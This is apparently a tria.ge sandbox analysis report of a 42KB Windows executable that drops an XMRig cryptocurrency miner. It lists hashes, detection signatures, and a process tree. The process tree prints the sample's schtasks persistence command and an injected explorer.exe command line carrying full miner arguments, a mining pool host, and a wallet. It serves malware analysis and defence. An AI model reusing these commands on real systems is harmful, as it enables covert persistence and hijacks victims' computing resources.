Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
13/03/2024, 03:36
Static task
static1
Behavioral task
behavioral1
Sample
c4dfc3e37ff44d6794f8fe89e464a90d.exe
Resource
win7-20240221-en
General
-
Target
c4dfc3e37ff44d6794f8fe89e464a90d.exe
-
Size
42KB
-
MD5
c4dfc3e37ff44d6794f8fe89e464a90d
-
SHA1
c1875a4ba364e9d74fccc96623b974618e3f5e44
-
SHA256
75e4dab693b826d6462a1d7251ad1eebe13aea193f68608ba0547607b19bc9fc
-
SHA512
7f49ec7136487c2b6242fddd0fdbd9a74353185e63784fc94d48772963ec71b74f3c13dfa003f7a35ffe864e5c0977c7dd0fea01d6eb9f3a62c747506d5d1917
-
SSDEEP
768:hFQx6YyMKQKEOuiQYvzusuCJrJw68b0soqv38mGL4VhmdSYLMt:8xTv7/gusfF8osoesmGLQhpxt
Malware Config
Signatures
-
XMRig Miner payload 11 IoCs
resource yara_rule behavioral2/memory/4580-39-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-41-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-43-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-45-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-46-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-47-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-48-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-49-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-50-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-54-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral2/memory/4580-55-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation c4dfc3e37ff44d6794f8fe89e464a90d.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation services64.exe -
Executes dropped EXE 2 IoCs
pid Process 2440 services64.exe 5092 sihost64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 49 raw.githubusercontent.com 50 raw.githubusercontent.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2440 set thread context of 4580 2440 services64.exe 114 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1748 schtasks.exe 228 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2820 c4dfc3e37ff44d6794f8fe89e464a90d.exe 2820 c4dfc3e37ff44d6794f8fe89e464a90d.exe 2440 services64.exe 2440 services64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2820 c4dfc3e37ff44d6794f8fe89e464a90d.exe Token: SeDebugPrivilege 2440 services64.exe Token: SeLockMemoryPrivilege 4580 explorer.exe Token: SeLockMemoryPrivilege 4580 explorer.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2820 wrote to memory of 440 2820 c4dfc3e37ff44d6794f8fe89e464a90d.exe 102 PID 2820 wrote to memory of 440 2820 c4dfc3e37ff44d6794f8fe89e464a90d.exe 102 PID 440 wrote to memory of 1748 440 cmd.exe 105 PID 440 wrote to memory of 1748 440 cmd.exe 105 PID 2820 wrote to memory of 2440 2820 c4dfc3e37ff44d6794f8fe89e464a90d.exe 107 PID 2820 wrote to memory of 2440 2820 c4dfc3e37ff44d6794f8fe89e464a90d.exe 107 PID 2440 wrote to memory of 1132 2440 services64.exe 109 PID 2440 wrote to memory of 1132 2440 services64.exe 109 PID 2440 wrote to memory of 5092 2440 services64.exe 111 PID 2440 wrote to memory of 5092 2440 services64.exe 111 PID 1132 wrote to memory of 228 1132 cmd.exe 112 PID 1132 wrote to memory of 228 1132 cmd.exe 112 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 PID 2440 wrote to memory of 4580 2440 services64.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c4dfc3e37ff44d6794f8fe89e464a90d.exe"C:\Users\Admin\AppData\Local\Temp\c4dfc3e37ff44d6794f8fe89e464a90d.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'3⤵
- Creates scheduled task(s)
PID:1748
-
-
-
C:\Users\Admin\AppData\Local\Temp\services64.exe"C:\Users\Admin\AppData\Local\Temp\services64.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'4⤵
- Creates scheduled task(s)
PID:228
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
PID:5092
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQmYM88CHfRtRr6KMKy --pass=test --cpu-max-threads-hint=20 --tls3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4012 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:81⤵PID:836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD5c4dfc3e37ff44d6794f8fe89e464a90d
SHA1c1875a4ba364e9d74fccc96623b974618e3f5e44
SHA25675e4dab693b826d6462a1d7251ad1eebe13aea193f68608ba0547607b19bc9fc
SHA5127f49ec7136487c2b6242fddd0fdbd9a74353185e63784fc94d48772963ec71b74f3c13dfa003f7a35ffe864e5c0977c7dd0fea01d6eb9f3a62c747506d5d1917
-
Filesize
7KB
MD58dc541a5c37afc1fbf747f315b3039f8
SHA142df50fa5f6b16167f50b567baea1d71d0b96605
SHA256a03ea36743a32f47054884f1f4cb5d42212c98a8c0b037404fa3037a0c1c8b91
SHA5126204d8db6e62b9715698e6ec59aa56a928dd763a1fd17b1d191fe24ca564a01cda053f97448fb57b5db346f360c58c0013101eef4852077b9b4249e71964f86c